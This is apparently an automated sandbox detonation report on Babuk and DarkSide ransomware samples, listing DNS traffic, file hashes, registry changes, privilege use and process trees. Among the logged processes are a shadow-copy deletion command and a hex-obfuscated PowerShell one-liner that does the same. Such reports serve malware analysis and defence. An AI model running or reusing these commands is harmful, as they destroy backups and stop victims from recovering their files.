US 8.8.8.8:53 102.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 106.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 110.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 126.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 120.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 87.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 81.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 77.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 71.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 75.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 91.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 95.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 104.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 88.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 98.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 112.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 114.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 109.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 116.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 113.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 122.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 115.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 127.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 85.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 153.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.0.127.10.in-addr.arpa udp
US 13.248.169.48:443 catsdegree.com tcp

Files

memory/2380-0-0x0000000001350000-0x0000000001367000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabC62.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarCB3.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/1760-40-0x000007FEF518E000-0x000007FEF518F000-memory.dmp

memory/1760-41-0x000000001B580000-0x000000001B862000-memory.dmp

memory/1760-42-0x00000000027A0000-0x00000000027A8000-memory.dmp

memory/1760-43-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/1760-44-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/1760-45-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/1760-46-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

memory/2380-47-0x0000000001350000-0x0000000001367000-memory.dmp

memory/1760-49-0x000007FEF4ED0000-0x000007FEF586D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 91a207778ee0970b4289a281bc319e08
SHA1 7af869acec9a13181b41df5014599d0e0494f1ed
SHA256 1ced3b518f4d7b84f40fcd894713af12a97ae9732cabee15b35944b10593d224
SHA512 ee6613e6e10a06269720b6ce25e271751d45327b11b7cde4fab5161dc8e41105ba8161f8f91c98f66440800ad19a6e189219f6328b5427f24913357fe8dda4ca

C:\Users\Admin\README.f0e1586e.TXT

MD5 f418a249405444da33cc73b402a26306
SHA1 1a6c493e74036f93f0dae4b65e6c543c213ce418
SHA256 b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09
SHA512 b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf

memory/2380-188-0x0000000001350000-0x0000000001367000-memory.dmp

memory/2380-241-0x0000000001350000-0x0000000001367000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6c03245d5980669fa8dcb0bb5136d217
SHA1 c675715811352edf59bcb7c9204f0640d8330e81
SHA256 d9dbb21c063fc20d970eee5ede2df22b3544ab8e1fb49946639d0db814016feb
SHA512 964fe4f7d273d549d51279024839b0e617211c9db0049231bb92119357d0bee83b50a8b09424b886fe515e7b53f08cddb57672261d2aa9649d36f6a388a0e23b

memory/2380-280-0x0000000001350000-0x0000000001367000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240508-en

Max time kernel

1561s

Max time network

1563s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"

Signatures

Babuk Locker

ransomware babuk

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (227) files with added filename extension

ransomware

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A

Enumerates physical storage devices

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2480 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 2480 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 2480 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 2480 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 1048 wrote to memory of 1564 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1048 wrote to memory of 1564 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1048 wrote to memory of 1564 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2480 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 2480 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 2480 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 2480 wrote to memory of 2372 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe C:\Windows\System32\cmd.exe
PID 2372 wrote to memory of 2560 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2372 wrote to memory of 2560 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2372 wrote to memory of 2560 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\vssadmin.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Babuk_20_04_2021_79KB.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

Network

N/A

Files

C:\PerfLogs\Admin\How To Restore Your Files.txt

MD5 81fc4c91a0938482f65a72216cda1e39
SHA1 3fb3d27ceb1502ddf0d68fa9251a6aec46036377
SHA256 59ac7c1a064a53196eb135e59ab7b658577fd2ad22b45a02b77f1df630912591
SHA512 ef34299b9f48c9362fadd6da53ef4c57a5d4b3cb95e35ad5be24f51249e8bbd5a5df519065212f120897461f7360c415c20dcebd74a29221086208d8f8d6d1f4

Analysis: behavioral18

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win10v2004-20240704-en

Max time kernel

1714s

Max time network

1156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"

Signatures

DarkSide

ransomware darkside

Renames multiple (162) files with added filename extension

ransomware

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1015551233-1106003478-1645743776-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\bf9fb421.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1015551233-1106003478-1645743776-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\bf9fb421.BMP" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1015551233-1106003478-1645743776-1000\Control Panel\Desktop\WallpaperStyle = "10" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bf9fb421 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bf9fb421\ = "bf9fb421" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\bf9fb421\DefaultIcon C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\bf9fb421 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\bf9fb421\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\bf9fb421.ico" C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: 36 N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DarkSide_01_05_2021_30KB.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 catsdegree.com udp
US 13.248.169.48:443 catsdegree.com tcp
US 8.8.8.8:53 48.169.248.13.in-addr.arpa udp
US 8.8.8.8:53 temisleyes.com udp
HK 154.219.131.251:443 temisleyes.com tcp
US 8.8.8.8:53 22.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 37.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 5.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 23.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 37.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 8.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 58.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 60.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 3.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 2.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 44.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 39.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 47.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 52.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 53.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 54.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 24.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 13.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 38.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 40.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 41.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 42.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 43.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 36.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 46.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 48.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 49.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 50.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 51.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 55.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 56.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 57.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 45.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 59.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 61.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 62.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 63.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 64.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 65.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 66.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 67.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 68.1.127.10.in-addr.arpa udp
US 8.8.8.8:53 69.1.127.10.in-addr.arpa udp
